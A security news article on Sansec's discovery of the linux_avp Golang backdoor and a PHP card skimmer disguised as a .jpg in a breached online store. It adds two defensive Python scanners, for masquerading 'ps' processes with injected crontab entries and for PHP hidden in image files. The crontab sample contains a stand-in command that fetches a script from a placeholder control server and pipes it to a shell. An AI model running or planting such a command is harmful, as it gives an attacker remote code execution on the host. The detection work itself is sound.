Security researchers from the Sansec Threat Research Team discovered a Linux backdoor. On October 8th, the same malware was submitted to VirusTotal with the comment "test". As of this writing, no other anti-virus vendor identifies this malware. The upload came only one day after Sansec's customer's store had been successfully breached.
The person who uploaded the malware could be the malware author, wanting to confirm that common anti-virus engines would not detect their creation.
The attackers began with a discovery phase in which they probed the e-store with automated eCommerce attack probes. After about a day and a half, the threat actors discovered and exploited a file upload vulnerability in one of the store's plugins, allowing them to upload a webshell and inject a software skimmer.
The attackers also uploaded a Golang-written Linux backdoor (linux_avp) that tries to pass itself off as a ps -ef process. The backdoor was found to be capable of receiving commands from a control server hosted on Alibaba (126.96.36.199). To achieve persistence, the backdoor injects a malicious crontab entry.
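Two of the behaviours described above give a defender something concrete to look for on a Linux host: a process that names itself `ps` but is backed by a binary that is not the system's `ps`, and a crontab entry that was injected for persistence. The following Python script is an added example for this article, not code from Sansec or from the incident; the "legitimate ps paths", the red-flag patterns and the sample crontab are assumptions constructed for illustration and should be tuned to the host being checked.

```python
import os
import re

# Where the real `ps` binary lives on common distributions.
# Assumption: constructed list for this example; adjust to the host's layout.
LEGIT_PS_PATHS = {"/bin/ps", "/usr/bin/ps"}

# Heuristics for attacker-injected crontab entries: download-and-run pipelines,
# executables parked in scratch directories, encoded payloads and @reboot hooks.
# These are indicators for triage, not proof of compromise.
CRON_RED_FLAGS = [
    re.compile(r"(curl|wget)\b.*\|\s*(ba)?sh"),   # download piped into a shell
    re.compile(r"(/tmp|/dev/shm|/var/tmp)/\S+"),   # binary in a world-writable dir
    re.compile(r"base64\s+(-d|--decode)"),         # encoded payload
    re.compile(r"@reboot"),                         # survives a reboot
]

def masquerading_process(comm: str, exe: str) -> bool:
    """True when a process calls itself `ps` (its /proc/<pid>/comm value) but the
    executable behind it is not a known ps binary, the trick described above."""
    return comm.strip() == "ps" and exe not in LEGIT_PS_PATHS

def suspicious_cron_entries(crontab_text: str) -> list:
    """Return the non-comment crontab lines that match at least one red flag."""
    hits = []
    for line in crontab_text.splitlines():
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        if any(p.search(stripped) for p in CRON_RED_FLAGS):
            hits.append(stripped)
    return hits

def scan_proc() -> list:
    """Walk /proc on a live Linux host and return (pid, comm, exe) for every
    process that looks like ps but is not. Requires permission to read the
    exe symlink of other users' processes (typically root)."""
    findings = []
    for pid in filter(str.isdigit, os.listdir("/proc")):
        try:
            with open(f"/proc/{pid}/comm") as f:
                comm = f.read()
            exe = os.readlink(f"/proc/{pid}/exe")
        except OSError:
            continue  # process exited, or we lack permission
        if masquerading_process(comm, exe):
            findings.append((int(pid), comm.strip(), exe))
    return findings

# Constructed sample crontab for the example; not from the incident.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/certbot renew --quiet
*/5 * * * * /tmp/.x/ps >/dev/null 2>&1
@reboot curl -s http://c2.example.invalid/a | sh
"""

if __name__ == "__main__":
    for entry in suspicious_cron_entries(SAMPLE_CRONTAB):
        print("suspicious cron entry:", entry)
    for pid, comm, exe in scan_proc():
        print(f"masquerading process: pid={pid} comm={comm} exe={exe}")
```

On a real host, run the crontab check over `crontab -l -u <user>` for each user and over the files under `/etc/cron.d`, not only the sample text; the process check compares the kernel's view of the executable with the name the process reports, which a renamed binary cannot fake.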
Sansec tweeted:
We found a new Golang malware agent “linux_avp”.
- targets eCommerce sites hidden as “ps-ef” process
- uses PKI
- Alibaba hosted control server
- compiled by user “dob”
The backdoor was allegedly created by user “dob” in the project folder “lin avp,” and it was codenamed GREECE by the development team.
The PHP-coded web skimmer was hidden in the /app/design/frontend/ folder as a .JPG image file (app/design/frontend/favicon absolute top[.]jpg). The skimmer loads a bogus payment form from the address listed below.
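A skimmer stored as a PHP file with a .jpg name is easy to catch once you stop trusting the extension: a genuine image starts with a known header, and a PHP open tag has no business inside it. The following Python scanner is an added example for this article, not Sansec's tooling or the incident's files; the sample bytes are constructed, and the store path is assumed to be a Magento-style tree such as the app/design/frontend/ folder mentioned above.

```python
import os
import re

# Leading bytes that genuine files of each image extension start with.
IMAGE_MAGIC = {
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".gif": (b"GIF87a", b"GIF89a"),
}

# PHP open tags. The bare `<?` form is left out on purpose: it also matches the
# XML declaration in embedded XMP metadata and would produce false positives.
PHP_TAG = re.compile(rb"<\?(php\b|=)")

def classify_image_file(name: str, data: bytes) -> str:
    """Classify a file that claims to be an image by its contents.

    Returns one of:
      'ok'          header matches the extension and no PHP tag is present
      'not-image'   extension says image but the header does not (the case above)
      'php-inside'  valid image header followed by a PHP tag (polyglot file)
      'unknown-ext' not an image extension this scanner checks
    """
    ext = os.path.splitext(name)[1].lower()
    if ext not in IMAGE_MAGIC:
        return "unknown-ext"
    header_ok = any(data.startswith(magic) for magic in IMAGE_MAGIC[ext])
    if not header_ok:
        return "not-image"
    if PHP_TAG.search(data) is not None:
        return "php-inside"
    return "ok"

def flag_samples(samples: dict) -> list:
    """Return the names (sorted) of samples that are not clean images."""
    return sorted(
        name for name, data in samples.items()
        if classify_image_file(name, data) in ("not-image", "php-inside")
    )

def scan_tree(root: str) -> list:
    """Walk a directory tree and return (path, verdict) for every file with an
    image extension whose bytes do not pass classify_image_file."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for fn in files:
            path = os.path.join(dirpath, fn)
            try:
                with open(path, "rb") as f:
                    data = f.read()
            except OSError:
                continue
            verdict = classify_image_file(fn, data)
            if verdict in ("not-image", "php-inside"):
                findings.append((path, verdict))
    return findings

# Constructed samples for the example; not the incident's files.
SAMPLES = {
    "logo.png": b"\x89PNG\r\n\x1a\n" + b"\x00" * 32,                 # clean image
    "fake.jpg": b"<?php echo 'not an image'; ?>",                    # PHP under a .jpg name
    "banner.jpg": b"\xff\xd8\xff\xe0" + b"\x00" * 16 + b"<?php echo 1; ?>",  # polyglot
}

if __name__ == "__main__":
    for name, verdict in ((n, classify_image_file(n, d)) for n, d in SAMPLES.items()):
        print(f"{name}: {verdict}")
    # Example invocation against a store tree (path is an assumption):
    for path, verdict in scan_tree("app/design/frontend"):
        print(f"{verdict}: {path}")
```

A finding of 'not-image' or 'php-inside' only tells you the file is not what its name says; whether the web server would actually execute it depends on its handler configuration, so the scan is best paired with a rule that the PHP handler is never mapped to upload and theme directories at all.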
Finally, Sansec concluded: “The person uploading the malware could very well be the malware author, claiming that common anti-virus engines will not detect their creation. Sansec has updated detection capabilities for our eComscan security monitor, and the malware was discovered on several servers in the United States and the European Union.”